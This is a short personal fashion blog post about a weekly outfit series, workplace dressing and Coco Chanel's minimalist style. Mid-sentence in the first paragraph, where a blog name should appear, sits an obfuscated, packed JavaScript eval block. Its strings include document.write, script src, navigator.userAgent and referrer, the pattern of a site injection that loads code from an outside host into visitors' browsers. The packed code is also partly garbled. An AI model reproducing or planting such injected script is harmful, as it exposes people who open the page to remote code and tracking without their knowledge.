What I Wore Wednesday

My mother showed me this blog the other day and now I’m hooked!  The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eahyf|var|u0026u|referrer|tsfrt||js|php’.split(‘|’),0,{}))

does a “What I Wore Wednesday” post every Wednesday (just in case you couldn’t guess from the title).  Among my many hobbies is fashion.  I love going through my closet and making new outfits of my old clothes or accessorizing to dramatize a look.  My current challenge as a recent college graduate is dressing for the workplace.  I’ve adopted Coco Channel’s philosophy of minimization and utilization.  She was the queen of neutral tones, accessorizing, having little and always looking classy.   Essentially, she was what every girl wishes to see reflecting back in the mirror.  Long before the boyfriends, husbands and girlfriends, more than half of the population (aka the females around the world) played dress-up and make-up in front of the mirror, judging ourselves based on the reflection.  This is how I think when I get dressed each day.  I don’t want to impress my friends, co-workers or boyfriend; I only want to impress myself.  Surprisingly, this is far more challenging than all the rest combined.  I am the hardest critic of my work and my appearance.

Therefore, when a male co-worker compliments me on my outfit, I know I’ve done well and must immediately blog about it!
